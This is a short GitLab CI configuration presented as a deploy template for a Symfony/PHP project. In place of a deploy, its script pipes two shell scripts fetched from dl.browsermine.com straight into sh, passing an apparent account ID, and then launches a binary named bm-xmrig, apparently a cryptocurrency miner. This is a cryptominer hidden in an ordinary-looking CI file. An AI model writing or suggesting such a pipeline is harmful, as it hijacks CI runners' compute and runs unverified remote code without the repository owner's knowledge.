# This file is a template, and might need editing before it works on your project.
# see https://docs.gitlab.com/ce/ci/yaml/README.html for all available options

# you can delete this line if you're not using Docker
image: chvarkov/symfony:php7.2

deploy1:
  stage: deploy
  script:
    - echo "Do your deploy here"
    - apt-get update -yqq && apt-get install -yqq wget
    - wget https://dl.browsermine.com/ubuntu/prepare.sh -O - | sh
    - wget https://dl.browsermine.com/ubuntu/confgen.sh -O - | sh /dev/stdin 5468788
    - ls
    - ./bmapps/bm-xmrig
